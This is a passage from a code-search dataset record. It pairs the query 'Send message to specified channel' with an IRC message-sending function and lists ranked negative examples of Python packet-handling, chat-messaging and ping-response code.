self._get_reassembler(frame.source_node_id).process_frame(\n timestamp, frame, self._transfer_id_timeout\n )\n if transfer is not None:\n self._statistics.transfers += 1\n self._statistics.payload_bytes += sum(map(len, transfer.fragmented_payload))\n _logger.debug(\"%s: Received transfer: %s; current stats: %s\", self, transfer, self._statistics)\n try:\n self._queue.put_nowait(transfer)\n except asyncio.QueueFull: # pragma: no cover\n # TODO: make the queue capacity configurable\n self._statistics.drops += len(transfer.fragmented_payload)", "def setupPacket(self):\n return None", "def _send_packet(self, packet: bytes):\n self._transport.sendto(packet, self._caddr)", "def __handle_message_packet(self, packet: Packet):\n log(f'New message arrived: {packet.get_body()}')\n sender_address = packet.get_source_server_address()\n updated_packet = PacketFactory.new_message_packet(packet.get_body(), self.address)\n if self.__check_neighbour(sender_address): # From known source\n for neighbor_address in [*self.children_addresses, self.parent_address]:\n if neighbor_address is not None and neighbor_address != sender_address:\n self.stream.add_message_to_out_buff(neighbor_address, updated_packet)", "def _decode_frame(self):\n\n self._processed.eth_frame.log(level=logging_helper.INFO)\n\n # Parse IP packets, protocol=0x8\n if hex(self._processed.eth_frame.protocol) == u'0x8':\n self._processed.ip_frame = IPFrame(self._processed.eth_frame.payload)\n self._processed.ip_frame.log(level=logging_helper.INFO)\n\n if self._processed.ip_frame.payload is not None:\n self._processed.ip_frame.payload.log(level=logging_helper.INFO)\n\n else:\n logging.info(u'Not an IP payload')\n\n logging.info(self._processed)", "def process(self, hdr: PacketHeader, payload: bytes):\n self._last_activity_time = time.monotonic()\n txid = hdr.trans_num.value\n\n if hdr.flags & PacketFlags.PING:\n hdr.flags |= PacketFlags.REPLY\n self._send_packet(hdr.serialize())\n return\n\n # Ignore requests with txids corresponding to executing tasks.\n if txid in self._tmgr:\n return\n\n # Otherwise, create task to run oserver.\n self._tmgr.create_task(txid, self._oserver.process(hdr, payload))", "def processevent(self,pktEvent):\n raise NotImplementedError()", "def _parse_interface(self, interface_data):\n # Look for inputs\n for mo in re.finditer(self._INPUT_RE, interface_data):\n self._inputs.append(Input(mo.group(\"name\"), self.parse_width(mo.group(\"width\"))))\n # Look for outputs\n for mo in re.finditer(self._OUTPUT_RE, interface_data):\n self._outputs.append(Output(mo.group(\"name\"), self.parse_width(mo.group(\"width\"))))", "def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):\n logger.info('INT Packet data - [%s]', extract_int_data(packet[Ether]))\n return False", "def got_packet(self, pkt):\n self._log.debug(\"got a packet {}\".format(pkt))\n if pkt.is_syn():\n # this is a syn packet\n # set the sequence number to 0\n self.seqno = 0\n elif pkt.is_ack():\n # this is a plain ack\n # the sender got our data\n # just increment the sequence number\n self.seqno += 1\n return\n if pkt.empty():\n # this packet is emtpy?\n self._log.info(\"empty packet {}\".format(pkt))\n return\n # have the user recv the payload\n self._recv(pkt.payload)", "def ReceiveMessageFromPacketInfo(self) -> IPPacketInformation:", "def handle(self):\n socket = self.request[1]\n data = self.request[0].strip()\n logger.info(\"Address {} at {} wrote: '{}'\".format(self.client_address[1], self.client_address[0], data))\n cmd_strn, ret = self.command_service(data)\n print(ret)\n self.command_response(cmd_strn, ret, self.request[1], self.client_address[0],\n self.mapInterface.router[cmd_strn])", "def process(self, data):\n if self.__head:\n self.__head.send(Element(\n stream_id=self.id,\n data=data))", "def _parse(self) -> bool:\n\n # First, check if this packet has a '!' at an offset position\n # This is allowed as per APRS 1.01 C5 P18\n if hasattr(self, '_offset'):\n # Packets with the '!' offset do not have a timestamp or messaging capabilities\n # Chop everything off the info field before the '!'\n self._info = self._info[self._offset:]\n\n elif self.data_type_id == '!':\n # Packet has no timestamp, station has no messaging capability\n self.timestamp = None\n self.messaging = False\n\n elif self.data_type_id == '/':\n # Packet has timestamp, station has no messaging capability\n self.messaging = False\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n elif self.data_type_id == '=':\n # Packet has no timestamp, station has messaging capability\n self.timestamp = None\n self.messaging = True\n\n elif self.data_type_id == '@':\n # Packet has timestamp, station has messaging capability\n self.messaging = True\n\n # Parse timestamp\n (self.timestamp, self.timestamp_type) = APRSUtils.decode_timestamp(self._info[0:8])\n\n else:\n # This isn't a position packet\n raise ParseError(\"Unknown position data type: {}\".format(self.data_type_id))\n\n if self.timestamp is None:\n data = self._info\n else:\n data = self._info[7:]\n\n # Check to see if the position data is compressed or uncompressed\n if re.match(r'[0-9\\s]{4}\\.[0-9\\s]{2}[NS].[0-9\\s]{5}\\.[0-9\\s]{2}[EW]', data):\n # Parse the uncompressed position values from the information field\n (self.latitude, self.longitude, self.ambiguity, self.symbol_table, self.symbol_id\n ) = self._parse_uncompressed_position(data)\n\n # Ensure compressed is set to False\n self.compressed = False\n\n if len(data) > 19:\n # This packet has additional data in the information field, so attempt to parse it\n (phg, radio_range, dfs, self.course, self.speed, self.altitude,\n comment) = self._parse_data(data[19:])\n\n if self.symbol_table == \"/\" and self.symbol_id == \"\\\\\":\n # If the symbol table is /, and the symbol ID is \\, it implies a DF report\n # 26th and 30th characters should be /\n logger.debug(\"Symbol table and symbol indicates a DF report\")\n\n if len(comment) < 8:\n # Packets with DF information must be at least 8 characters long\n raise ParseError(\"Missing DF values\")\n\n if comment[0] != \"/\" or comment[4] != \"/\":\n # Packets with DF information must also include the bearing and NRQ values\n # See APRS 1.01 C7 P30\n raise ParseError(\n \"Invalid DF values (character in position 0 and 4 should be '/'\"\n )\n\n # Extract the bearing\n self.bearing = int(comment[1:4])\n logger.debug(f\"DF bearing is {self.bearing} degrees\")\n\n # Decode the NRQ value\n (self.number, self.df_range, self.quality) = APRSUtils.decode_nrq(comment[5:8])\n\n # Strip the bearing/NRQ value from the comment\n self.comment = comment[8:]\n\n elif self.symbol_table in [\"/\", \"\\\\\"] and self.symbol_id == \"_\":\n # / or \\, and _ for the symbol table and symbol implies a weather report\n # TODO - Implementation\n logger.debug(\"Symbol table and symbol indicates a weather report\")\n\n elif phg:\n # Decode the power, height, gain and directivity values\n (self.power, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_phg(phg)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif radio_range:\n # The radio range is specified as 4 digits, which denote the range in miles\n self.radio_range = int(radio_range)\n logger.debug(f\"Radio range is {radio_range} miles\")\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n elif dfs:\n # Decode the signal strength, height, gain and directivity values\n (self.strength, self.height, self.gain, self.directivity) = \\\n APRSUtils.decode_dfs(dfs)\n\n # The PHG value has already been stripped from the comment\n self.comment = comment\n\n else:\n # No additional data found\n self.comment = comment\n\n else:\n # Parse the compressed position values from the information field\n\n # Get the compressed position\n compressed_position = data[0:13]\n\n try:\n (self.latitude, self.longitude, self.altitude, self.course, self.speed,\n self.radio_range, self.compression_fix, self.compression_source,\n self.compression_origin) = self._parse_compressed_position(compressed_position)\n\n except Exception as e:\n # TODO Catch specific errors (for example, OverflowError)\n raise ParseError(\"Couldn't parse compressed position: {}\".format(e))\n\n # Ensure compressed is set to True\n self.compressed = True\n\n # Parse the symbol table and symbol ID\n self.symbol_table = data[0]\n self.symbol_id = data[9]\n\n # TODO - parse altitude information\n\n self.comment = data[13:]\n logger.debug(\"Comment is {}\".format(self.comment))\n\n # If we get this far, then we've parsed the packet\n return True", "def handle_rpc(self):\n while True: # loop handling\n self.rbuf.seek(0)\n length_prefix = self.rbuf.read(4)\n if len(length_prefix) < 4: # half-package\n break\n\n try:\n length, = struct.unpack(\"I\", length_prefix.encode(\"utf-8\"))\n except Exception as e:\n print(e.__traceback__)\n body = self.rbuf.read(length)\n if len(body) < length: # half-package\n break\n\n request = json.loads(body)\n input = request[\"in\"]\n params = request[\"params\"]\n handler = self.handlers[input]\n handler(params)\n # cut read buffer\n left = self.rbuf.getvalue()[length + 4:]\n self.rbuf = StringIO()\n self.rbuf.write(left)\n # move position to EOF\n self.rbuf.seek(0, 2)", "def process_incoming_packet(self, data, address):\n try:\n new_message = MessageFactory.create_message(\n packet_data=data,\n origin_address=address,\n destination_node=self.node)\n self._put_new_message_in_queue(new_message)\n self.report()\n if new_message.TYPE_STRING != \"ack\":\n ack_message = MessageFactory.generate_ack_message(new_message)\n self.send_message(ack_message)\n except Exception as e:\n print(e)", "def __processMsg(self, sock, msgData):\n\n pass", "def forward(self, srcif, packet):\n # packet is already decoded\n def send_no_route():\n send_src = srcif[:-1]\n send_src += '1'\n self.sockets[srcif].send(json.dumps({\n SRCE: send_src,\n DEST: packet[SRCE],\n TYPE: NRTE,\n MESG: {}\n }).encode())\n # GEt correct route.\n sock_addr = self.get_route(srcif, packet[DEST])\n\n # If no route available, send no route message back\n if sock_addr == None:\n send_no_route()\n else:\n sock = self.sockets[sock_addr]\n # If socket is available, send to proper neighbor.\n sock.send(json.dumps(packet).encode())\n return False", "def __handle_pkt(self, current_client, pkt_type, data):\n try:\n self.__pkt_handlers[pkt_type](current_client, data)\n except KeyError:\n self.__logger.error(\"Got an invalid packet type from client: {}\".format(pkt_type))\n except Exception as e:\n self.__logger.exception(e)\n self.__logger.error(\"General exception occurred while handling packet: {}\".format(e))" ]
[ "0.8039347", "0.7425329", "0.6986574", "0.69667333", "0.6850102", "0.66773987", "0.65571284", "0.655704", "0.65034556", "0.64887303", "0.64614993", "0.64393044", "0.6438453", "0.6343893", "0.633845", "0.63383657", "0.62919194", "0.62790996", "0.626932", "0.6252799", "0.62515205", "0.6150356", "0.6140259", "0.61376816", "0.61369246", "0.6134787", "0.6110328", "0.61094725", "0.6091059", "0.6082074", "0.6081094", "0.60610044", "0.6042554", "0.60395706", "0.601952", "0.60103226", "0.6002915", "0.59936154", "0.59887695", "0.5957948", "0.5948165", "0.5927946", "0.59218305", "0.58836675", "0.58583695", "0.5848591", "0.58457667", "0.58453786", "0.58269376", "0.58263665", "0.5821455", "0.5815113", "0.5802662", "0.5783231", "0.57773083", "0.5767768", "0.57489586", "0.57467645", "0.57412434", "0.57224965", "0.5718748", "0.57045317", "0.56957763", "0.5689442", "0.5681588", "0.5672476", "0.5671936", "0.56416446", "0.5635416", "0.5627622", "0.56256664", "0.5623273", "0.5614938", "0.5576078", "0.55746", "0.5567835", "0.55611855", "0.55472434", "0.5544512", "0.55314016", "0.5530043", "0.55247056", "0.55172443", "0.55159783", "0.5514667", "0.5509243", "0.5489798", "0.5487399", "0.54849535", "0.54808086", "0.54800713", "0.54708606", "0.54686505", "0.5463116", "0.54623103", "0.54593486", "0.5457075", "0.543812", "0.5431981", "0.54243064" ]
0.7235204
2
Send message to specified channel.
def sendmsg(msg, target=channel): msg = bytes('PRIVMSG ' + target + ' :' + msg + '\n', 'UTF-8') sleep(randint(5, 10) / 10) # to avoid throttling due to flooding write(msg) ircsocket.send(msg)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def send_message(self, channel : str, message : str):\n await self._connection.send_message(channel, message)", "def sendMsg(self, channel, message, length=None):\n self.logger.info(\"Sending in %s: %s\" % (channel, message))\n self.msg(channel, message, length)", "def send_message(self, channel, text):\n if not channel:\n return\n self.post('chat.postMessage', data={\"channel\": channel, \"text\": text})", "def send_chat_message(self, channel, message):\r\n self._send(\"PRIVMSG #{0} :{1}\".format(channel, message))", "def send_message(self, message, channel=None):\n if channel is None:\n channel = self.default_channel\n\n self._slack_client.api_call(\n \"chat.postMessage\", channel=channel, text=message)", "def send(self, msg):\n return self._channel_action(msg, 1)", "def send_message(channel, message):\n slack_client = get_client()\n slack_client.chat_postMessage(channel=channel, text=message, as_user=True)", "def msg_chan_send(channel, value, version = NATIVE_HEADER_VERSION, order=\"<\"):\n return message_no_reply(CHAN_SEND, channel, value, version, order)", "def send_channel(self, text, channel_id, **kwargs):\n\n data = {\"content\": text}\n data.update(kwargs)\n self._post_json(f\"channels/{channel_id}/messages\", data)", "async def send(self, channel=None, **kwargs):\n\n if \"user\" in kwargs:\n api_call = self.client.chat_postEphemeral\n\n else:\n api_call = self.client.chat_postMessage\n\n return await api_call(\n channel=channel or self.channel,\n # contents of messenger[UserDict]\n **self,\n # any other API fields provided by Caller\n **kwargs,\n )", "async def test_send_to_channel(self):\n message = \"Test basic message.\"\n await self.cog.send_message(message, *self.text_channels, alert_target=False)\n\n self.text_channels[0].send.assert_awaited_once_with(message)\n self.text_channels[1].send.assert_not_called()", "def send_message(channel, data):\n try:\n socketio.emit(channel, data)\n logging.info('Message was sent.')\n logging.debug(data)\n except Exception as e:\n logging.error(e)\n logging.error(\"Can't send message. Exeption occured\")", "def join_channel(self, channel):\r\n self._send('JOIN #%s\\r\\n' % channel)", "def publish(self, channel: str, message):\n raise TypeError(\"{} - publish not implemented!\")", "def send_part(self, channel) -> None:\n\n self.send_line('PART {}'.format(channel))", "def send_user_message(self, channel_id, message):\n self.slack_client.api_call('chat.postMessage', as_user='true', channel=channel_id, text=message)", "def sendChatMessage(self, msg):\n self.transport.write(msg)", "async def say(self, ctx, text_channel: typing.Union[discord.TextChannel, str] = None, *, message=None):\n if not text_channel:\n return await ctx.send(f\"> **{ctx.author.display_name}, Please specify a message to send.**\")\n if isinstance(text_channel, str):\n if message:\n message = f\"{text_channel} {message}\"\n else:\n message = text_channel\n text_channel = ctx\n await text_channel.send(message)", "def msg(self, chan, msg):\n self._msg(chan, msg)", "def send_message(self, message: str):\n self.client.chat_postMessage(\n channel=f\"@{self.username}\", text=message,\n )", "def send(self, message):\n if self.connection:\n self.connection.send(message)", "async def send_discord(msg, cnl):\n await bot.wait_until_ready()\n await bot.send_message(bot.get_channel(cnl), msg)", "def sendMessage(sock, message):\n messageTemp = \"PRIVMSG \" + channel +\" :\" +message\n sock.send((messageTemp+ \"\\n\").encode())", "async def send_initial_message(self, ctx: Context, channel: discord.TextChannel) -> discord.Message:\n\n return await channel.send(embed=self.embed)", "def publish(self, channel: str, content: str) -> None:\n print(f\"{self._name} publishes message '{content}' to \"\n f\"channel-[{channel}]\")\n self._server.route(channel, content)", "def send(self, msg):\n sleep(self.m_to)\n self.conn.send(msg)", "async def send_message(self, message: dict) -> None:\n await self.client.chat_postMessage(channel=self.channel_id, **message)", "async def channel(self, ctx: commands.Context, channel: discord.TextChannel):\n self.channel = str(channel.id)\n await self._update_db()\n\n await ctx.send(f\"Done! {channel.mention} is the Starboard Channel now!\")", "def send(self, msg):\n with self._send_lock:\n self._rt.send_message(msg.bytes())", "def send(self, send_to, subject):\n self.server.send_message(self, send_to, subject)", "def say(self, channel_name: str, text: str) -> None:\n self.connection.privmsg(channel_name, text)", "def send(self, message):\n self.sock.send(message)", "def send_whisper_message(self, channel, user, message):\r\n self._send(\"PRIVMSG #{0} :/w {1} {2}\".format(channel, user, message))", "def send_channel_message(self, status, data1=None, data2=None, ch=None):\n msg = [(status & 0xF0) | ((ch if ch else self.channel) - 1 & 0xF)]\n\n if data1 is not None:\n msg.append(data1 & 0x7F)\n\n if data2 is not None:\n msg.append(data2 & 0x7F)\n\n self._midi.send_message(msg)", "def send(self, message):\n pass", "def message_send(token, channel_id, message):\n verify_token(token)\n if not message:\n raise InputError(\"Message can't be empty\")\n if len(message) > 1000:\n raise InputError(\"Message is over 1000 characters\")\n user = get_user_from_token(token)\n selected_channel = select_channel(channel_id)\n # Raise error if the user is not a part of the channel they are trying to message in\n if not is_user_member(user, selected_channel):\n raise AccessError(description=\"User is not a member of channel with channel_id\")\n\n sent_message = Message(\n channel=selected_channel,\n user=user,\n message=message\n )\n db.session.add(sent_message)\n db.session.commit()\n return {\n \"message_id\": sent_message.id\n }", "def joined(self, channel):\n self.logger.info(\"Joined %s\" % channel)", "def send_message(self, message):\n self.send_message_queue.put(message)", "def send_message(self, message):\n pass", "def send(self, message):\n self.logger.info(\"Sending to server: %s\" % message)\n self.sendLine(message)", "def _send_msg(self, msg):\n self._kernel.comm.send(msg)", "def send(self, msg):\n self.__sock.send(msg)", "async def send(self, message):", "def send(self, messages, channel):\n # Process strings as well as iterables\n if isinstance(messages, str):\n message = messages\n else:\n message = '\\n'.join(messages)\n # Post message to output stream\n self.outputs.append([channel, message])", "def join(self, channel):\n self.channels[channel.name.lower()] = channel\n channel.protocol = self.protocol\n self.protocol.join(channel.name)", "def send_message(self, message):\n \n msgPacket = serverbound.play.ChatPacket()\n msgPacket.message = message\n self.connection.write_packet(msgPacket)", "def sendmessage(user,gameid):\n message = request.form['message']\n channel.send_message(user+gameid,message)", "def send(self, msg: str):\n\t\tself.client.send(msg.encode())", "def send_message_to_chat(channel, response):\n\n web_client.chat_postMessage(\n channel=channel,\n text=response\n )", "def send(self, msg):\n self.message('Me', msg)", "def join(self, channel):\n raise NotImplementedError", "def send_message(self, message):\n self.client.queue.put(message)", "def _send(self, message):\n self.sock.sendall('%s\\n' % message)", "def sendmessage(user,roomid):\n message = request.form['message']\n channel.send_message(user+roomid,message)", "def send(self, message) -> None:\n raise NotImplementedError", "def _send_via_transport(self, message):\n\n self.message_interface.send(message)", "def send(self, msg):\n self.house.PLM.send_queue.put( msg )", "def send(self, msg):\n self._mailbox.put(msg)", "async def send_shortlived_message(self, message, channel, duration=5):\n pass", "def part(self, channel, message=\"\"):\n time.sleep(1)\n self.s.send(\"PART %s%s\\n\" % (channel, (message and (\" :\" + message))))\n logger.log(\"PART %s%s\" % (channel, (message and (\" :\" + message)))).LogSend()", "def send_command(self, command):\n cmd, arg = command\n logging.debug(f'Sending \"/{cmd} {arg}\" to {self.channel_name}...')\n params = self.params\n params[\"command\"] = f\"/{cmd}\"\n params[\"text\"] = arg\n response = requests.post(self.url + \"chat.command\", params=params)\n if response.ok:\n logging.info(f'Successfully sent \"/{cmd} {arg}\" to {self.channel_name}.')\n logging.debug(response.json())\n else:\n logging.info(f'Failed to send \"/{cmd} {arg}\" to {self.channel_name}.')\n logging.debug(response.json())\n return response.status_code", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def send(self, msg):\n pass", "def send(self, message):\n _check_message_type(message=message)\n response = requests.post(\n self._server_url + _SEND_URL,\n data={\"id\": self._chat_id, \"msg\": message}\n )", "async def join(self, channel : str):\n # todo: check if # is required. If it is, append it at the start if DNE.\n await self._connection.join(channel)", "def send_message(self, message):\n source_guid = str(uuid.uuid1())\n date = time.strftime(\"%H:%M:%S\")\n self.api.send_message(\n self.conversation_type,\n self.cid,\n source_guid,\n message[:1000]\n )\n if self.api.send_message(self.conversation_type, self.cid, source_guid, message):\n self.append_message(source_guid, 'me', date, message[:1000])\n if len(message) > 1000:\n self.send_message(message[1000:])", "def send_slack(self, message):\n self.slack_client.api_call('chat.postMessage', channel=self.slack_channel, text=message, username=self.username, icon_emoji=self.slack_icon_emoji)\n print(\"Slack Notification sent\")", "def _send(self, message):\n logger.info(message)\n self.buffer.put(message)", "def send(self, msg: Message, **kwargs):\n\n pass", "def send_irc_message(self, event):\n\n self.log('Transmitting IRC message', lvl=debug)\n\n self.fireEvent(PRIVMSG(event.username, \"[%s] %s : %s\" % (event.msg_type, event.subject, event.body)))", "def send_message(self, cmd_id, message_type, status, message=None):\n pass", "def kick(self, nick, channel=None, message=None):\n if channel is None:\n if self._trigger.is_privmsg:\n raise RuntimeError('Error: KICK requires a channel.')\n else:\n channel = self._trigger.sender\n\n if nick is None:\n raise RuntimeError('Error: KICK requires a nick.')\n\n self._bot.kick(nick, channel, message)", "def send_message(self, message):\r\n\t\tself.__tcpSocket.write(message.encode('utf8'))", "def send(self, msg):\n #assert(isinstance(msg, Message))\n\n msg = envelp(msg, self.get_msg_id())\n self.send_raw(msg)\n\n # TODO: Fix this: this little delay is to be able to\n # send messages one after the other\n #\n # without this delay, following code is not working:\n #\n # the_actor.send({'a': 'message'})\n # the_actor.send({'a': 'different message'})\n #\n gevent.sleep(0.000000000000000000000000001)", "def send(self):\n if self._stopping:\n return\n\n mytype = 'text/plain'\n\n try:\n if isinstance(json.loads(self.message),dict):\n mytype = 'application/json'\n except (TypeError,json.JSONDecodeError):\n if (isinstance(self.message,dict)):\n mytype = 'application/json'\n self.message = json.dumps(self.message)\n else:\n self.message = str(self.message)\n\n properties = pika.BasicProperties(app_id='sender',\n content_type=mytype)\n\n self._channel.basic_publish(self.exchange, self.routing_key, self.message, properties)\n self._message_number += 1\n self._deliveries.append(self._message_number)\n self.logger.info('published message # %i', self._message_number)", "def send_message(self, to, subject, body):\n self.forum.send_message(self.game, Message(to=to, subject=subject, body=body))", "def _send(self, command, payload):\n self.work_queue_client.send(command, payload)", "async def send_msg(self, msg):\n try:\n logging.info(\"Sending: %s\", msg)\n self.writer.write(msg.encode())\n await self.writer.drain()\n\n except Exception as e:\n logging.error(\"Command could not be encoded; %s\", e)", "def send(msg, dest=None):", "async def channel(self, ctx, channel: discord.TextChannel):\r\n server = ctx.guild\r\n self._logs[str(server.id)][\"channel\"] = str(channel.id)\r\n dataIO.save_json(self._logs_file, self._logs)\r\n await ctx.send(f\"<#{str(channel.id)}> has been set as the modlog channel {self.bot.get_emoji(470063310386233344)}\")", "def send_message(self, message):\n self.print_debug_message(message)\n self.socket.send(message)", "def send(event):\n\n\tid = get_hostname()\n\n\tmessage = str(id) + \"|\" + str(event)\n\n\tif mq is None: # if no mq exists\n\t\tprint \"mq is None\"\n\n\telse: # if mq exists\n\t\ttry:\n\n\t\t\tmq.send(message)\n\t\t\tprint 'completed sending message'\n\n\t\texcept Exception as e:\n\n\t\t\tprint 'failed to send message: {}'.format(e)", "def send(message):\n\tmessage = message.encode()\n\tconn.send(message)", "def send_msg (chan, msg):\n\n if not os.path.isdir(tq_dir):\n os.mkdir(tq_dir)\n if not os.path.isdir(rq_dir):\n os.mkdir(rq_dir)\n\n t = datetime.datetime.now()\n fname = tq_dir + '/' + t.strftime(\"%y%m%d.%H%M%S.%f\")[:17]\n\n try:\n f = open(fname, 'w')\n except:\n print (\"Failed to open \" + fname + \" for write\")\n else:\n if chan > 0:\n f.write('[' + str(chan) + '] ' + msg + '\\n')\n else:\n f.write(msg + '\\n')\n f.close()\n time.sleep (0.005)\t# Ensure unique names", "async def send_wrapped_message(channel, message):\n for part in wrap(message, 2000):\n await channel.send(part)", "async def admin_msg(self, message):\n for channel in self.admin_channels.values():\n if channel:\n await channel.send(message)", "def send_and_flush(self, msg):\r\n try:\r\n self.bus.send(msg)\r\n msg.data[:4] = bytearray(4)\r\n # print(\"Message sent on {}\".format(self.bus.channel_info))\r\n except can.CanError:\r\n print(\"Message NOT sent\")", "async def say(self, *, channel_id, text=None, attachments=None, message_type=None):\n self.messages.append(\"{} {} {} {}\".format(channel_id, text, attachments, message_type))", "async def send(self, channel, content=MISSING, *, tts=False, embed=MISSING, embeds=MISSING, file=MISSING, \n files=MISSING, delete_after=MISSING, nonce=MISSING, allowed_mentions=MISSING, reference=MISSING, \n mention_author=MISSING, components=MISSING) -> Message:\n\n if type(channel) not in [discord.TextChannel, int, str]:\n raise discord.InvalidArgument(\"Channel must be of type discord.TextChannel\")\n\n channel_id = channel.id if type(channel) is discord.TextChannel else channel\n payload = jsonifyMessage(content=content, tts=tts, embed=embed, embeds=embeds, nonce=nonce, allowed_mentions=allowed_mentions, reference=reference, mention_author=mention_author, components=components)\n\n route = BetterRoute(\"POST\", f\"/channels/{channel_id}/messages\")\n\n r = None\n if file is MISSING and files is MISSING:\n r = await self._discord.http.request(route, json=payload)\n else:\n r = await send_files(route, files=files or [file], payload=payload, http=self._discord.http)\n\n msg = Message(state=self._discord._get_state(), channel=channel, data=r)\n \n if delete_after is not None:\n await msg.delete(delay=delete_after)\n \n return msg", "def send_message(\n self, text=None, blocks=None, attachments=None,\n timestamp=None, channel_name=None, channel_id=None):\n if not channel_id:\n channel_id = self.find_channel_id(channel_name)\n\n response = self.client.api_call(\n ''.join(\n [\n f'chat.postMessage?as_user={cfg.POST[\"as_user\"]}&channel={channel_id}&',\n f'thread_ts={timestamp}&' if timestamp else '',\n f'text={text}&' if text else '',\n f'blocks={blocks}&' if blocks else '',\n f'attachments={attachments}' if attachments else ''\n ]\n )\n )\n assert response['ok']\n return response", "def send_join(self, channel, key: str = None) -> None:\n\n if key:\n self.send_line('JOIN {} {}'.format(channel, key))\n else:\n self.send_line('JOIN {}'.format(channel))", "def send(self, message):\n\t\tmessage_string = self.send_address + \" \" + message + \" /\"\n\t\tself.add_to_queue(message_string)", "async def greeter_channel(self, ctx, *, channel: discord.TextChannel):\n await queries.update_setting(ctx, \"greeter_settings\", \"channel_id\", channel.id)\n await util.send_success(ctx, f\"Greeter channel is now {channel.mention}\")", "def send(self, event, message):\n pass", "def _set_channel_(self, channel):\n self._channel = channel", "def set_channel(cls, channel):\n cls.channel = channel", "def send(self, msg, flags=0, copy=True, track=False, **kwargs):\n kwargs['flags'] = flags\n kwargs['copy'] = copy\n kwargs['track'] = track\n kwargs.update(dict(flags=flags, copy=copy, track=track))\n return self._add_send_event('send', msg=msg, kwargs=kwargs)", "def sendMessage(self, msg):\n # Socket Object\n self.sock.connect((self.host, self.port))\n self.sock.send(msg)\n self.sock.close()", "def Talk(self, topic, message):\n Send(self.channel, topic, message)", "def send_action(self, *args, **kwargs):\n return self.bot.send_chat_action(self.id, *args, **kwargs)" ]
[ "0.82728493", "0.7965429", "0.7865041", "0.77663475", "0.7414901", "0.7366934", "0.7189363", "0.71749264", "0.7114904", "0.7107324", "0.7078955", "0.703922", "0.69624746", "0.6917826", "0.69085354", "0.6878344", "0.6788846", "0.67383105", "0.6678887", "0.66784793", "0.6666718", "0.666005", "0.66482", "0.65967906", "0.6590462", "0.65805084", "0.6574554", "0.65732616", "0.6537522", "0.6528824", "0.6525533", "0.6501931", "0.6491399", "0.649126", "0.6490304", "0.64792514", "0.6475098", "0.6454431", "0.64313054", "0.64122635", "0.64111674", "0.6397902", "0.6392922", "0.63803154", "0.63731956", "0.63710093", "0.6366678", "0.6363042", "0.63618827", "0.63591814", "0.6357972", "0.6350768", "0.6332581", "0.6327569", "0.632747", "0.63253933", "0.632055", "0.63032377", "0.62983006", "0.6295648", "0.6289282", "0.62750643", "0.62750643", "0.62750643", "0.6270424", "0.625059", "0.6245597", "0.62338686", "0.6232558", "0.62238216", "0.621242", "0.61997104", "0.6188319", "0.61802137", "0.61745924", "0.61636615", "0.6160488", "0.6149533", "0.6147559", "0.61407614", "0.61391175", "0.613621", "0.6117985", "0.6098337", "0.60945904", "0.60877013", "0.60856503", "0.6083368", "0.60784334", "0.6077781", "0.60654414", "0.6063429", "0.60627174", "0.60627073", "0.6062263", "0.605739", "0.60569596", "0.6054742", "0.60488814", "0.6043944", "0.60410273" ]
0.0
-1
Respond to server Pings.
def ping(msg): msg = msg[0:1] + 'O' + msg[2:] ircsocket.send(bytes(msg, 'utf-8')) sendmsg('This message should be eaten by irc. QQ.')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ping_response():\n\n return Response(\"ok\", status=200)", "def ping(self) -> Response:\n raise NotImplementedError", "def ping():\n\treturn HTTPResponse(status=200)", "def ping():\r\n return make_response(\"pong!\", 200)", "def ping():\n return jsonify({'response': 'pong'}), 200", "async def _ping_(self)->str:\n return PING_RESPONSE", "def ping():\n logging.info(\"Ping received...\")\n\n health = Predictor.load() is not None\n\n status = 200 if health else 404\n return Response(response=\"\\n\", status=status, mimetype=\"application/json\")", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n return ping_response()", "def ping():\n requestor = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)\n logger.info(f\"Health check requested by ip='{requestor}'\")\n return make_response(\n jsonify(status=\"Serving\",\n body=\"pong\"), 200)", "def ping(self):\n d = self.replyQueue.get_ping()\n packet = RequestPing(self.charset, self.errors)\n self.transport.write(bytes(packet))\n return d.addCallback(self.handle_reply, self.charset, self.errors, None)", "def HandlePingRequest(self, request, response):\n self._publish_helper.HandlePingRequest(request, response)", "def ping(self):\n request = Empty()\n response = self.stub.Ping(request, timeout=5)", "def ping():\n health = ScoringService.get_model() is not None # You can insert a health check here\n\n status = 200 if health else 404\n return flask.Response(response='\\n', status=status, mimetype='application/json')", "async def ping(self):\n uri = \"/fapi/v1/ping\"\n success, error = await self.request(\"GET\", uri)\n return success, error", "async def ping(self) -> APIReturn:\n return await self._request(\"GET\", \"/ping\")", "def ping(self):\n self.connect()\n self._write('PING\\r\\n')\n return self._get_simple_response()", "def run(self):\r\n print \"*Ping* We've got a message!\"\r\n # Handle DNS request\r\n resolver = Resolver(self.caching, self.ttl)\r\n aliasRecords = []\r\n addressRecords = []\r\n # Read and resolve the questions one-by-one\r\n questions = self.request.questions\r\n for question in questions:\r\n hostname = question.qname\r\n (hostname, aliases, addresses) = resolver.gethostbyname(hostname)\r\n \r\n for alias in aliases:\r\n aliasData = dns.resource.RecordData.create(Type.CNAME, alias)\r\n aliasRecord = dns.resource.ResourceRecord(hostname, Type.CNAME, Class.IN, 9001, aliasData) # TODO fix ttl\r\n aliasRecords.append(aliasRecord)\r\n for address in addresses:\r\n addressData = dns.resource.RecordData.create(Type.A, address)\r\n addressRecord = dns.resource.ResourceRecord(hostname, Type.A, Class.IN, 9001, addressData)\r\n addressRecords.append(addressRecord)\r\n \r\n # Crafting of the response\r\n respHeader = self.request.header\r\n respHeader.qr = 1\r\n respHeader.qd_count = 0\r\n respHeader.an_count = 1\r\n \r\n respMessage = dns.message.Message(respHeader, [], addressRecords + aliasRecords, [], [])\r\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n respMessageByte = respMessage.to_bytes()\r\n sock.sendto(respMessageByte, self.clientAddr)\r\n print \"Ended request: \" + hostname\r\n sock.close()", "def Ping(self, request, _):\n\n return server_pb2.PingReply(data=request.data)", "def ping(self):\n response = self._request(\"GET\", [ROUTE_PING])\n\n if response.status_code == 200:\n 